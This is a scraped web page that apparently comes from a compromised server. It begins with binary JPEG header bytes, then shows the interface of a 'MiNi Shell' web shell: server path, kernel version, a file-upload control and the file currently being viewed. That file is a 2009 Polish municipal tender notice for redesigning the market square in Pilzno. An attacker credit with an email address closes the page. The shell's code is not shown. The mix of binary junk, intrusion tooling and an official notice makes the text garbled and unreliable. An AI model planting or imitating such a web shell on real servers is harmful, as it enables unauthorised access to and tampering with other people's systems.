JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090401/86246-N-2009.html

<p class="kh_header"><b>Pilzno: Opracowanie dokumentacji projektowej dla przebudowy Rynku w Pilźnie</b><br>
<b>Numer ogłoszenia: 86246 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pilzno , ul. Rynek 6, 39-220 Pilzno, woj. podkarpackie, tel. 014 6721036, faks 014 6722491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pilzno.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla przebudowy Rynku w Pilźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:

Opis stanu istniejącego:
Pilzno uzyskało prawa miejskie w 1354 r. Układ urbanistyczny miasta w którego skład wchodzi rynek i wychodzące z niego ulice wraz z zabudową składającą się z domów murowanych i drewnianych - tj. obszar podlegający przebudowie - wpisany jest do rejestru zabytków. Ponadto pod nawierzchnią rynku i ulic znajdują się podziemne korytarze z czasów średniowiecznych. Powierzchnia rynku wynosi ok. 1 ha.
Na terenie podlegającym opracowaniu znajdują się sieci uzbrojenia terenu tj. kanalizacja deszczowa (odcinkami ogólnospławna), sieć wodociągowa, gazowa, telekomunikacyjna, napowietrzna i podziemna sieć elektryczna.

Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla przebudowy Rynku w Pilźnie, w tym odcinka ulicy Węgierskiej, odcinka ul. Legionów i ul. Grodzkiej.

2.1. W zakres przebudowy wchodzi:
I. dla rynku:
1)	wykonanie nowej płyty rynku, w tym:
- odkrycie wejścia do podziemnych korytarzy,
2)	przebudowa/budowa ciągów pieszo-jezdnych wraz z miejscami parkingowymi,
3)	budowa obiektów małej architektury, w tym fontanny,
4)	budowa oświetlenia rynku, 
5)	przełożenie napowietrznych sieci i przyłączy elektroenergetycznych na podziemne,
6)	przebudowa i rozbudowa kanalizacji deszczowej wraz z przyłączami,
7)	budowa kanalizacji sanitarnej wraz z przyłączami dla budynków po stronie południowej,
8)	przebudowa i budowa sieci wodociągowych wraz z przyłączami,
9)	rozbiórka wiaty przystankowej,

II. dla ul. Węgierskiej (na odcinku od rynku do skrzyżowania z ul. Sobieskiego i 
ul. Ks. Karola Szczeklika włącznie - o dł. ok. 200 m):
1)	przebudowa ciągu pieszo-jezdnego wraz z miejscami parkingowymi,
2)	przełożenie napowietrznych sieci i przyłączy elektroenergetycznych na podziemne,
3)	budowa oświetlenia ulicznego,
4)	przebudowa i rozbudowa kanalizacji deszczowej wraz z przyłączami,
5)	budowa kanalizacji sanitarnej wraz z przyłączami,

III. dla ul. Legionów (na odcinku od rynku do skrzyżowania z ul. 3-go Maja i ul. Słowackiego włącznie - o dł. ok. 100 m):
1)	przebudowa ciągu pieszo-jezdnego, w tym:
- zaprojektowanie jego odwodnienia,
- renowacja kamiennego umocnienia nasypu chodnikowego oraz zaprojektowanie balustrady,
2)	budowa nowego odcinka kanalizacji deszczowej i jej włączenie w istniejącą kanalizację w ul. 3-go Maja,
3)	przełożenie napowietrznych sieci i przyłączy elektroenergetycznych na podziemne,
4)	budowa oświetlenia ulicznego.

IV. dla ul. Grodzkiej:
	1) przełożenie napowietrznych sieci i przyłączy elektroenergetycznych na podziemne.

Ponadto należy w ulicy Kapuścińskiego i ulicy Cichej przełożyć napowietrzne sieci i przyłącza elektroenergetyczne na podziemne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) tj.:

1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych.

Na potwierdzenie spełniania w/w warunku wykonawcy dostarczą wraz z ofertą następujące dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wraz z ofertą muszą być złożone poniższe dokumenty dla każdego z nich):
- 	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
-	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy oraz łączne kwalifikacje i doświadczenie), w tym:

a)	wykażą się w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, opracowaniem dokumentacji projektowej (projektu budowlanego i wykonawczego) dla budowy lub przebudowy miejsca użyteczności publicznej takiego jak rynek lub plac, o wartości prac projektowych wynoszącej minimum 50 000 zł brutto,

Na potwierdzenie spełniania w/w warunku wykonawcy dostarczą wraz z ofertą wykaz opracowanych projektów (wg załącznika nr 3) w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z dokumentami potwierdzającymi, że prace projektowe zostały wykonane należycie.

b)	dysponują lub będą dysponować, na potrzeby realizacji niniejszego zamówienia następującymi osobami:
b1) 	projektant architekt spełniający poniższe wymagania:
- 	posiadający uprawnienia budowlane do projektowania w specjalności architektonicznej oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa,
-	który opracował projekt budowlany i wykonawczy dla budowy lub przebudowy miejsca użyteczności publicznej takiego jak rynek lub plac, o powierzchni minimum 0,5 ha,
b2)	projektant branży drogowej spełniający poniższe wymagania:
-	posiadający uprawnienia budowlane do projektowania w specjalności drogowej oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa,
-	który opracował projekt budowlany i wykonawczy dla budowy lub przebudowy minimum 1 km ulic,
b3)	projektant branży sanitarnej spełniający poniższe wymagania:
-	posiadający uprawnienia budowlane do projektowania w zakresie sieci wodociągowych i kanalizacyjnych oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa,
-	który wykaże się zaprojektowaniem (projekt budowlany i wykonawczy) minimum 1 km wodociągów oraz minimum 5 km kanalizacji,
b4)	projektant branży elektrycznej spełniający poniższe wymagania:
-	posiadający uprawnienia budowlane do projektowania w zakresie sieci i instalacji elektrycznych oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa,
-	który wykaże się zaprojektowaniem (projekt budowlany i wykonawczy) minimum 5 km sieci elektrycznych.

Na potwierdzenie spełniania w/w warunku wykonawcy załączą do oferty wykaz projektantów -  wg załącznika nr 4 do SIWZ - oraz uprawnienia budowlane do projektowania w wymaganych specjalnościach i aktualne zaświadczenia o przynależności do właściwej izby samorządu zawodowego, dla wszystkich projektantów.

3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Dla potwierdzenia spełniania warunków zawartych w pkt 1-3 wykonawcy dostarczą również oświadczenie o spełnianiu warunków udziału w postępowaniu.

Ocena spełniania w/w warunków będzie dokonywana na zasadzie oceny spełnia lub nie spełnia. Nie spełnienie chociażby jednego warunku spowoduje wykluczenie wykonawcy z postępowania przetargowego.

o	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
- 	nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
-	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne  i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy pod rygorem wykluczenia z postępowania o udzielenie zamówienia obowiązani są załączyć do swych ofert następujące oświadczenia i dokumenty:

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

3.	Wykaz opracowanych projektów (wg załącznika nr 3 do SIWZ) w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.

4.	Dokumenty potwierdzające, że w/w prace projektowe zostały wykonane należycie.

5.	Wykaz projektantów wg załącznika nr 4 do SIWZ.

6.	Pisemne zobowiązanie innego podmiotu do udostępnienia osoby projektanta (w przypadku, jeżeli wykonawca nie dysponuje osobą projektanta).

7.	Uprawnienia budowlane do projektowania dla wszystkich projektantów oraz aktualne zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa.

8.	Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pilzno.um.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pilźnie
adres: 39-220 Pilzno, ul. Rynek 6, pok. nr 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 11:00, miejsce: Urząd Miejski w Pilźnie
adres: 39-220 Pilzno, ul. Rynek 6, pok. nr 3 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com